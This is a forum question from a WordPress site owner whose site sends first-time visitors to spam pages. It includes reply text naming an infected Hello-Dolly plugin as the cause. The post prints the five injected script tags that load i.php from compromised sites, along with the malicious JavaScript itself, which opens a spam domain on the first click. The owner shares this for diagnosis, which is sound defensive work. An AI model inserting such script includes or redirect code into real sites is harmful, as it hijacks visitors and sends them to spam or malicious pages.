A site running Wordpress is opening a spam site in new tab on first click for new users. If you go directly to the URL or have visited the site before, the malware does not trigger. If you are a new user and navigate to the page from Google search results for example, then you will be redirected (through a new tab) to a random spam page. URL seems to differ each time.
So far I have tried different malware scanners (Sucuri and Wordfence among others) with no result. I have tried disabling all plugins, changing theme, updating Wordpress. Tried disabling pre-fetch. Malware still present.
I have found out that there are five scripts that are getting included in the header somehow. Looking at the source when navigating to the site in Incognito mode through Google results, I can see the references present. Scripts loaded in header:
<script type='text/javascript' src='https://longtailmagic.com/domain/i.php' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php' id='hello_newscript4-js'></script>
All five seem to be random pages running Wordpress, serving the same malicious script. Looking at event listeners, I see i.php:7 under click.
Inspecting the i.php served from one of the sites, it has the following:
localStorage.setItem('test', 'testValue');
if ((localStorage.getItem('test') !== null) && (localStorage.getItem('click') == null)){
var click_r = false;
document.addEventListener("click", function(){
if(click_r == false){
var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
document.cookie = "a=a; expires=" + date.toGMTString();
localStorage.setItem('click', 'click');
window.open("http://etbetrehyheartling.tk/index/?8131599557550");
click_r = true;
}
});
}
Is there a way to find the source of where these script includes are generated and added to the header? The mission is to get rid of the script references, this seems to be the way to shake off the malware redirecting new users to a spam site. I have tried String Locator with different keywords to get closer to the source, but no luck so far.
According to various blogs, it is the Hello-Dolly plugin which have been infected. Removing the plugin shall fix the issue. Check the article here https://wordpress.org/support/topic/suspected-malware/